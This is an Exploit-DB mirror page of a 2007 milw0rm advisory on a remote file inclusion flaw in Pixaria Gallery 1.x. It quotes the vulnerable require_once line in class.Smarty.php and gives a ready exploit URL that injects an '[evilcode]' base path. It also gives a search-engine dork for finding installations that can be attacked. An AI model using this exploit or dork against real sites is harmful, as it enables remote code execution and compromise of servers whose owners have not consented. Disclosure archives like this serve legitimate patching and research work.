exploit-db-mirror/exploits/php/webapps/3733.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

20 lines
No EOL
861 B
Text

Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability
-----------------------------------------------------------------------------------------
# scripts : Pixaria Gallery 1.x
# Discovered By : irvian
# scripts site : http://pixaria.com/
# Thanks To : #hitamputih #nyubicrew #patihack
# special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork : powered by Pixaria. Gallery
------------------------------------------------------------------------------------------
bug found:
/resources/includes/class.Smarty.php
// Load the main Smarty class
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");
Exploit: http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode]
# milw0rm.com [2007-04-14]